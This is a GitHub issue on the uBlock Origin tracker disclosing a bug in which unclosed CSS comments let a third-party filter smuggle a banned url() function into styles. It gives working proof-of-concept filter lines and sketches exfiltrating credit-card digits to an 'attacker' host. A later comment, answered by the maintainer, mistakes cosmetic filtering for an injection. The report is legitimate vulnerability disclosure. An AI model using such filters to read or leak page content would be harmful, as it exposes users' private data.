Security: comments can be used to smuggle url() functions into css values.

taviso commented 3 years ago

Prerequisites

[X] I verified that this is not a filter issue (MUST be reported at filter issue tracker)
[X] This is not a support issue or a question
[X] I performed a cursory search of the issue tracker to avoid opening a duplicate issue
[X] The issue is not present after wholly disabling uBlock Origin ("uBO") in the browser
[X] I checked the documentation to understand that the issue I report is not a normal behavior

I tried to reproduce the issue when...

[X] uBO is the only extension
[X] uBO with default lists/settings
[X] using a new, unmodified browser profile

Description

If I understand the filter security model correctly, third party filter lists are trusted to hide content, but are not permitted to modify or read page content. For this reason, the css url() function is not permitted in any :style() rules, because that could be used to modify and/or exfiltrate content.

I guess the obvious way to exfiltrate content would be to auto-generate a ton of input.creditcard:has-text(/^0/):style(background-image: url(http://attacker/?matched=0) filters, but I guess you already realized this and that's why you ban url() 😃

Anyway, I think I've found a way to get a url() past the parser, it doesn't check if comments are closed in variables, so this filter:

example.com##div:style(--foo: 1/*)
example.com##div[bar="*/;background-image: url(https://google.com);}/*"]

Generates this CSS:

div
{--foo: 1/*}

.div-gpt-ad
{width:1px!important;height:1px!important;min-height:1px!important;}

div[bar="*/;background-image: url(https://google.com);}/*"],
[href^="http://www.FriendlyDuck.com/"],

A specific URL where the issue occurs

https://www.example.com/

Steps to Reproduce

Create the following filter in My filters:

example.com##div:style(--foo: 1/*)
example.com##div[bar="*/;background-image: url(https://storage.googleapis.com/gd-wagtail-prod-assets/original_images/evolving_google_identity_3x2.jpg); background-size: cover;}/*"]

Visit this link, observe that there is an image background. I think this should be impossible.

Screenshot 2021-08-24 221513

Expected behavior

The css url() function is correctly banned.

Actual behavior

The parser is confused by unclosed comments.

uBlock Origin version

1.37.2

Browser name and version

Chrome 92

Operating System and version

Fedora 34

josefhuelk commented 3 years ago

I am using UBlock Origin in firefox and experienced an HTML/CSS Injection.

I checked my clipboard history to confirm that the injection must have happened inside the browser.

This is the full injected code. https://zerobin.net/?4ea4f656641e00a9#dvOszgwDNnt2qCQwyLH/x4hYfgpzsn2KUiqnI9hnTMs=

The injected css class is named .sharebtn The code was not running since it was just in the css tag but the links are very shady. Here are some snippets to make it indexable by search-engines

[href^=""], iframe[src^="https://isupportjournalism.com/"][style], CLOUDFLARE-APP[app-id="no-adblock"], div[style*="box-shadow: rgb(136, 136, 136) 0px 0px 12px; color: "], img[width="320"][height="50"], iframe[width="320"][height="50"], amp-auto-ads,

I am using Firefox. This is the list of active filters. My custom filters are not problematic.

Please fix this.

gorhill commented 3 years ago

@joseftogo These are user CSS styles, that's how cosmetic filtering works. If you don't want cosmetic filtering, you can disable it.

uBlockOrigin / uBlock-issues